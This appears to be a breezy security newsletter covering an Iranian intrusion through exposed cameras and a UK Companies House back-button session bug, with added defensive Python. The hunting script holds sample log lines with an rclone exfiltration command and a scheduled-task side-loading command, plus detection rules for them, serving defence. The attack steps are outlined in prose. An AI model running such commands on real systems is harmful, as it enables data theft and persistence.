50 TB Citizen Files Hijacked by Tehran, 200k Devices Bricked: $18M Bill Lands on US-Canada Defense Tab

TL;DR

  • Iranian threat actor MuddyWater has been inside US and Canadian networks since February 2026, entering through unpatched Hikvision and Dahua cameras, exfiltrating 50 TB of data and wiping more than 200,000 endpoints
  • A UK Companies House session-handling bug let the browser back button reopen signed-in dashboards, exposing the private details of over 5 million companies for five months

😈 50 TB Heist: Iranian Hackers Turn US-Canada Cameras Into Spygrid, Brick 200k Devices

50 TB of your files just became Tehran’s Netflix queue—then they bricked 200k laptops for the credits 😈💥 That’s every Hik camera from DC to Calgary serving Mullah-cam before the wipe. Defense contractors got the bill: $18 M popcorn fee. Taxpayers—feeling the burn yet?

Since 1 Feb, the Iranian crew MuddyWater has treated U.S. and Canadian networks like an open buffet, slipping in through Hikvision and Dahua cameras left exposed by long-patched authentication bypasses from 2017 and 2021 (CVE-2017-7921 in Hikvision, CVE-2021-33044 in Dahua). Inside, they parked the Dindoor backdoor, funneled 50 TB of blueprints and live surveillance feeds to Wasabi object-storage buckets using Rclone, a legitimate sync tool, and then wiped more than 200,000 laptops and phones with a Shamoon-style wiper. Estimated downtime and recovery bill: $12–18 M.

How did a webcam become a spy?

  • Step 1: Scan the internet for cameras still running firmware that carries the 2017 and 2021 authentication bypasses.
  • Step 2: Bypass the login, drop a small loader (Stagecomp), then pull a Python backdoor (Fakeset) from a CDN your proxy already trusts.
  • Step 3: Persist with scheduled tasks that side-load the payload, and run C2 over Telegram bots and Starlink IP space, so the traffic blends in with consumer satellite users.
  • Step 4: Exfiltrate the data, wipe the endpoints, and leave.

Impacts in one painful gulp

  • Battlefield intel: Real-time feeds from defense perimeters handed to Iran on a platter.
  • Wallet bleed: Eight-figure downtime bill for Fortune 500s.
  • Supply-chain rot: Malware bundled with legitimate software installers, so your next “update” may come with a Tehran postmark.

What now?

Upgrade every Hikvision and Dahua camera to firmware released after 2023 and verify the version on the device rather than trusting the management console, put cameras on an isolated VLAN with no route to the internet or to user workstations, and hunt for Rclone binaries and configs whose remotes point at cloud storage your backup team never set up. Anything less is leaving the key under the doormat for someone who has already emptied the safe.
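One way to hunt for the tradecraft in the four steps above and the Rclone check just mentioned, as an added example that is not from the article or any vendor: the log lines are constructed, Sysmon-style process and network events, and the three heuristics (rclone pushing to a remote nobody allowlisted or running from a user-writable path, a scheduled task whose action runs a LOLBin against a DLL in a user-writable directory, a non-browser process talking to the Telegram bot API) are assumptions about what this activity looks like in telemetry.

```python
"""Hunt for MuddyWater-style indicators in endpoint telemetry (added example).

Heuristics and sample events are constructed assumptions, not vendor rules.
"""
import json
import ntpath
import re

ALLOWED_REMOTES = {"corpbackup"}          # assumption: remotes IT actually runs
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
REMOTE_TOKEN = re.compile(r"^([A-Za-z][\w-]*):(.*)$")   # rclone remote:path
DRIVE_PATH = re.compile(r"^[A-Za-z]:[\\/]")              # C:\... is not a remote

# Constructed sample events, one JSON object per line (not real telemetry).
SAMPLE_LOG = r'''
{"type":"process","host":"cam-mgmt-01","image":"C:\\Users\\svc\\AppData\\Local\\Temp\\rclone.exe","cmdline":"rclone.exe copy D:\\Projects\\blueprints wasabi:archive-01 --transfers 32 -q"}
{"type":"process","host":"build-07","image":"C:\\Program Files\\rclone\\rclone.exe","cmdline":"rclone.exe sync E:\\backups corpbackup:nightly"}
{"type":"process","host":"ws-112","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks /create /tn Updater /tr \"rundll32.exe C:\\Users\\Public\\Libraries\\stage.dll,Run\" /sc minute /mo 10"}
{"type":"network","host":"ws-112","image":"C:\\Users\\Public\\Libraries\\svchost.exe","dest_host":"api.telegram.org","dest_port":443}
{"type":"network","host":"ws-004","image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","dest_host":"api.telegram.org","dest_port":443}
'''


def rclone_remotes(cmdline):
    """Yield rclone remote names from a command line, skipping flags, drive paths and URLs."""
    for tok in cmdline.split()[1:]:
        if tok.startswith("-") or "://" in tok or DRIVE_PATH.match(tok):
            continue
        m = REMOTE_TOKEN.match(tok)
        if m:
            yield m.group(1)


def check_event(ev):
    """Return a list of (rule, host, detail) findings for one event."""
    image = ntpath.basename(ev.get("image", "")).lower()
    cmd = ev.get("cmdline", "")
    findings = []
    if ev["type"] == "process" and image in ("rclone.exe", "rclone"):
        unknown = [r for r in rclone_remotes(cmd) if r not in ALLOWED_REMOTES]
        if unknown or USER_WRITABLE.search(ev["image"]):
            findings.append(("rclone_unknown_remote", ev["host"], cmd))
    if ev["type"] == "process" and image == "schtasks.exe" and "/create" in cmd.lower():
        if any(b in cmd.lower() for b in LOLBINS) and USER_WRITABLE.search(cmd):
            findings.append(("schtasks_sideload", ev["host"], cmd))
    if (ev["type"] == "network"
            and ev.get("dest_host", "").endswith("api.telegram.org")
            and image not in BROWSERS):
        findings.append(("telegram_c2", ev["host"], ev["image"]))
    return findings


def hunt(log_text):
    """Run every rule over a newline-delimited JSON log and collect findings."""
    findings = []
    for line in log_text.strip().splitlines():
        if line.strip():
            findings.extend(check_event(json.loads(line)))
    return findings


if __name__ == "__main__":
    for rule, host, detail in hunt(SAMPLE_LOG):
        print(f"{rule:22} {host:12} {detail}")
```

The allowlist is the load-bearing part: Rclone is a legitimate tool, so the signal is the destination, not the binary. Tune ALLOWED_REMOTES and BROWSERS to your estate before trusting the output.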

Outlook: short, medium, long—choose your ache

  • 0–3 mo: More wiper tantrums in finance & health while credentials stay valid.
  • 3–12 mo: Expect firmware supply-chain poison and satellite-ground-station hijacks.
  • 12 mo+: Regulators will finally mandate signed updates; until then, it’s BYO tourniquet.

If your security strategy still trusts a $60 camera to guard a billion-dollar network, congratulations—you’ve built a skyscraper on quicksand and handed Tehran the hose.


😱 Back-Button Blunder Exposes 5M UK Companies for 5 Months

5M UK firms left naked by a BACK button 😱—like leaving the vault open for 5 MONTHS while you grab coffee! 🇬🇧 Directors’ home addys & DOBs one click away. ICO “investigating” = slow-motion slap. Check your filings NOW—unless you fancy surprise fraud charges.

A single October 2025 code tweak turned the UK’s corporate registry into a peep-show: press the browser back button and a previously signed-in dashboard reopened, no password, no consent. For five months every Companies House filer (5 million firms, the entire register) had directors’ dates of birth, home addresses and corporate email addresses on tap. Anyone who stumbled on the bug had an estimated 15 days on average to rummage around, impersonate directors or queue fake filings. On 13 Mar 2026 at 13:00 GMT the service was pulled offline; 72 hours later a patched portal came back up, still blushing.

  • Privacy: more than 5 million directors’ home addresses exposed → identity-theft kits now retail-ready.
  • Governance: fraudulent filings can slip through → up to 5 years in the slammer under fraud laws, yet policing is reactive.
  • Trust: credit agencies, lenders and insurers feast on this data → a poisoned well could hike due-diligence costs for every UK PLC.

Regulators (ICO, NCSC) sprinted in, and emails went out to every registered mailbox: “Screenshot your filings, scream if something’s off.” An internal code review is promised, plus multi-factor authentication, something the site should have worn like underwear since 2015. Note that MFA hardens the login step only; a session that survives sign-out never touches the login step, so the actual fix is server-side session invalidation and cache controls on authenticated pages. Meanwhile, Ghost Mail, Dan Neidle and random tweeters converged on the same culprit: sloppy session handling in last autumn’s “improvement” release.
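The bug class described in the two paragraphs above, shown as an added example that is not Companies House code: a toy server and browser model in which the vulnerable sign-out only expires the cookie on the client and authenticated pages carry no cache directive, so the browser’s back/forward cache re-shows the dashboard and a captured session id keeps working; the hardened variant deletes the session server-side and sends Cache-Control: no-store. The account name and route names are constructed.

```python
"""Back-button session replay: vulnerable pattern next to the hardened one.

Added example (not Companies House code). Two controls close this bug class:
server-side session invalidation on sign-out, and Cache-Control: no-store on
every authenticated response so the back/forward cache cannot re-show it.
"""
import secrets

SESSIONS = {}  # server-side session store: sid -> username


def login(username):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def get_dashboard(sid, hardened):
    """GET /dashboard -> (status, headers, body)."""
    user = SESSIONS.get(sid)
    if user is None:
        return 302, {"Location": "/sign-in", "Cache-Control": "no-store"}, ""
    headers = {"Content-Type": "text/html"}
    if hardened:
        headers["Cache-Control"] = "no-store"   # never serve this from a cache
    return 200, headers, f"<h1>Filings for {user}</h1>"


def logout(sid, hardened):
    """POST /sign-out. The weak version only expires the cookie client-side."""
    if hardened:
        SESSIONS.pop(sid, None)                  # kill the session server-side too
    return {"Set-Cookie": "sid=; Max-Age=0"}


class Browser:
    """Minimal browser: a cookie and a back/forward cache of past responses."""

    def __init__(self, hardened):
        self.hardened = hardened
        self.sid = None
        self.history = []

    def visit_dashboard(self):
        resp = get_dashboard(self.sid, self.hardened)
        self.history.append(resp)
        return resp

    def sign_out(self):
        logout(self.sid, self.hardened)
        self.sid = None                          # honour Set-Cookie expiry

    def back(self):
        status, headers, body = self.history[-1]
        if "no-store" in headers.get("Cache-Control", ""):
            return self.visit_dashboard()        # must refetch; server decides
        return status, headers, body             # served straight from bfcache


def dashboard_visible_after_back(hardened):
    """True if the next person at the keyboard sees the previous user's page."""
    b = Browser(hardened)
    b.sid = login("director@example.com")       # constructed account
    b.visit_dashboard()
    b.sign_out()
    status, _, body = b.back()
    return status == 200 and "Filings for" in body


def old_session_replayable(hardened):
    """True if a captured session id still works after the user signed out."""
    sid = login("director@example.com")
    logout(sid, hardened)
    status, _, _ = get_dashboard(sid, hardened)
    return status == 200


if __name__ == "__main__":
    for h in (False, True):
        print("hardened" if h else "vulnerable",
              "| back-button replay:", dashboard_visible_after_back(h),
              "| old sid replay:", old_session_replayable(h))
```

Of the two controls, server-side invalidation is the one that matters most: no-store keeps an honest browser from replaying a cached page, but only deleting the session stops anyone who already holds the id.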

Short-term cheat-sheet

  • Next 90 days: forensics hunt for doctored docs; ICO preps compliance love-letters.
  • Q4-2026: MFA finally mandatory; expect grumpy finance directors juggling fobs.
  • 2027-28: amended Computer Misuse Act may criminalise “negligent navigation bugs,” giving CIOs nightmares and lawyers billable dreams.

The takeaway: if a back-button can unpick the national company vault, imagine what a determined scoundrel with a scraper and a shopping list could do. Until Whitehall codes like it’s 2026, not 1996, every “Download PDF” click is a dice-roll for UK plc.


In Other News

  • OpenSSL 3.5, OpenSSH 10.2, and libtiff updates released with Post-Quantum Cryptography warnings and critical vulnerability patches
  • Microsoft Purview integrates with Fabric to enforce data governance, DLP, and AI usage controls across enterprise data estates
  • Jozu launches Agent Guard with hypervisor isolation and local policy enforcement to prevent AI agent governance bypass
  • Systemd 260 removes legacy SysV init support, raises baseline to Linux 5.10, glibc 2.34, and OpenSSL 3.0 for modern Linux systems